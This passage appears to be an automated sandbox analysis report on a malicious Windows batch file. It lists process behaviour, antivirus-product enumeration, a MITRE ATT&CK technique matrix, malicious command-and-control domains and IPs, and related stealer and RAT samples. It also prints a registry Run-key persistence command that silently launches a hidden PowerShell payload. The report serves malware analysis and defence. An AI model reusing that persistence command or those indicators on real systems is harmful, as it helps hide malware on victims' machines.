Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$rbx-1ktMxXBv VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$rbx-1ktMxXBv VolumeInformation

Source: C:\Windows\System32\dllhost.exe

Code function: 40_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

40_2_0000000140002300

Source: C:\Windows\System32\conhost.exe

Code function: 20_2_000001B444908090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

20_2_000001B444908090

Source: powershell.exe, 00000008.00000002.1694896454.00000201CD248000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2711777669.000001B795D34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: dllhost.exe	Binary or memory string: MsMpEng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	141 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Obfuscated Files or Information	11 Input Capture	2 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	22 Command and Scripting Interpreter	11 Scheduled Task/Job	813 Process Injection	1 Software Packing	Security Account Manager	143 System Information Discovery	SMB/Windows Admin Shares	11 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	31 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	1 DLL Side-Loading	NTDS	491 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	31 Registry Run Keys / Startup Folder	1 File Deletion	LSA Secrets	2 Process Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Rootkit	Cached Domain Credentials	261 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	261 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	813 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	2 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1 (2).cmd	0%	ReversingLabs

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://aka.ms/pscore6	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
ipwho.is	195.201.57.90	true	false	unknown
azure-winsecure.com	154.216.20.132	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ipwho.is/	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/pscore6xGA	powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000008.00000002.1940456822.00000201DF0CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E520000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000023.00000002.2175061332.0000000004E19000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2175061332.0000000004E28000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://go.micro	powershell.exe, 00000026.00000002.2212213314.000001A38F45A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000008.00000002.1940456822.00000201DF0CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsoftA	powershell.exe, 00000008.00000002.1695203762.00000201CD3A0000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6	powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2212213314.000001A38E311000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2175061332.0000000004E03000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2212213314.000001A38E311000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
154.216.20.132	azure-winsecure.com	Seychelles		135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	true
195.201.57.90	ipwho.is	Germany		24940	HETZNER-ASDE	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524984
Start date and time:	2024-10-03 14:53:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	18
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1 (2).cmd
Detection:	MAL
Classification:	mal100.spyw.evad.winCMD@54/91@2/2
EGA Information:	Successful, ratio: 63.6%
HCA Information:	Successful, ratio: 99% Number of executed functions: 72 Number of non-executed functions: 271
Cookbook Comments:	Found application associated with file extension: .cmd

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94, 20.42.73.29, 93.184.221.240
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
Execution Graph export aborted for target conhost.exe, PID 5376 because there are no executed function
Execution Graph export aborted for target dwm.exe, PID 984 because there are no executed function
Execution Graph export aborted for target lsass.exe, PID 640 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7580 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtFsControlFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: 1 (2).cmd

Simulations

Behavior and APIs

Time	Type	Description
08:54:04	API Interceptor	4x Sleep call for process: WMIC.exe modified
08:54:08	API Interceptor	123960x Sleep call for process: powershell.exe modified
08:54:19	API Interceptor	2x Sleep call for process: WerFault.exe modified
08:55:54	API Interceptor	192x Sleep call for process: winlogon.exe modified
08:55:55	API Interceptor	169x Sleep call for process: lsass.exe modified
08:55:56	API Interceptor	158x Sleep call for process: dwm.exe modified
08:55:56	API Interceptor	1122x Sleep call for process: svchost.exe modified
08:56:07	API Interceptor	9x Sleep call for process: cmd.exe modified
08:56:07	API Interceptor	10x Sleep call for process: conhost.exe modified
14:55:34	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
14:55:42	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
154.216.20.132	SC.cmd	Get hash	malicious	Unknown	Browse
	1.cmd	Get hash	malicious	Unknown	Browse
	2.cmd	Get hash	malicious	Unknown	Browse
	download_2.exe	Get hash	malicious	Quasar	Browse
195.201.57.90	SPt4FUjZMt.exe	Get hash	malicious	AsyncRAT, Luca Stealer, MicroClip, PythonCryptoHijacker, RedLine	Browse	/?output=json
	765iYbgWn9.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json
	765iYbgWn9.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json
	WfKynArKjH.exe	Get hash	malicious	AsyncRAT, Luca Stealer, MicroClip, RedLine	Browse	/?output=json
	ubes6SC7Vd.exe	Get hash	malicious	Unknown	Browse	ipwhois.app/xml/
	cOQD62FceM.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	/?output=json
	Clipper.exe	Get hash	malicious	Unknown	Browse	/?output=json
	cOQD62FceM.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json
	Cryptor.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json
	Cryptor.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	/?output=json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
azure-winsecure.com	SC.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	1.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	2.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	download_2.exe	Get hash	malicious	Quasar	Browse	154.216.20.132
ipwho.is	SC.cmd	Get hash	malicious	Unknown	Browse	195.201.57.90
	1.cmd	Get hash	malicious	Unknown	Browse	108.181.98.179
	2.cmd	Get hash	malicious	Unknown	Browse	195.201.57.90
	download_2.exe	Get hash	malicious	Quasar	Browse	147.135.36.89
	MZs41xJfcH.exe	Get hash	malicious	PureLog Stealer, Quasar, zgRAT	Browse	195.201.57.90
	N5mRSBWm8P.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	Pedido09669281099195.com.exe	Get hash	malicious	DarkTortilla, Quasar	Browse	195.201.57.90
	mtgjyX9gHF.exe	Get hash	malicious	Quasar	Browse	108.181.98.179
	SecuriteInfo.com.BackDoor.QuasarNET.3.14065.23993.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	http://ufvskbzrquea.pages.dev/	Get hash	malicious	TechSupportScam	Browse	195.201.57.90
bg.microsoft.map.fastly.net	SC.cmd	Get hash	malicious	Unknown	Browse	199.232.210.172
	Ton618.exe	Get hash	malicious	Quasar	Browse	199.232.214.172
	Ton618 (2).exe	Get hash	malicious	Quasar	Browse	199.232.210.172
	https://drmerp.com/bWFpbEBrc2xhdy5jby51aw==&xBvSo7gjDRPy&hmr&x-ad-vt-unk&OC305935	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	2.cmd	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://arcor.cfd	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	veEGy9FijY.exe	Get hash	malicious	SmokeLoader	Browse	199.232.210.172
	http://investmentmemo.xyz	Get hash	malicious	HtmlDropper	Browse	199.232.210.172
	https://www.google.com.pe/url?q=Y7AzKRq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kI3xqbL8&sa=t&url=amp%2F%E2%80%8Bfc%C2%ADcid%E3%80%82io/www/%E2%80%8Brosan%C2%ADasidon%C2%ADiotri%C2%ADcologista%E2%80%8B.co%C2%ADm.%C2%ADbr/lo/lo//nJ5u8/Y21jX2FsbF9lbXBsb3llZXNfY29zdGFfcmljYUBjYXRhbGluYS5jb20=$	Get hash	malicious	HtmlDropper	Browse	199.232.214.172
	mnFHs2DuKg.exe	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	SC.cmd	Get hash	malicious	Unknown	Browse	195.201.57.90
	2.cmd	Get hash	malicious	Unknown	Browse	195.201.57.90
	file.exe	Get hash	malicious	Vidar	Browse	49.12.197.9
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	49.12.197.9
	gp4uQBDTP8.exe	Get hash	malicious	Xehook Stealer	Browse	116.203.0.21
	dNNMgwxY4f.exe	Get hash	malicious	Xehook Stealer	Browse	116.203.0.21
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	49.12.197.9
	oRdgOQMxjr.exe	Get hash	malicious	RedLine	Browse	178.63.51.126
	https://www.diamondsbyeden.com/	Get hash	malicious	Unknown	Browse	136.243.216.232
	file.exe	Get hash	malicious	Vidar	Browse	49.12.197.9
SKHT-ASShenzhenKatherineHengTechnologyInformationCo	SC.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	RICHIESTA_OFFERTA_RDO2400423.docx.doc	Get hash	malicious	GuLoader	Browse	154.216.20.22
	1.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	2.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	download_2.exe	Get hash	malicious	Quasar	Browse	154.216.20.132
	New order02102024.doc	Get hash	malicious	Nanocore	Browse	154.216.20.22
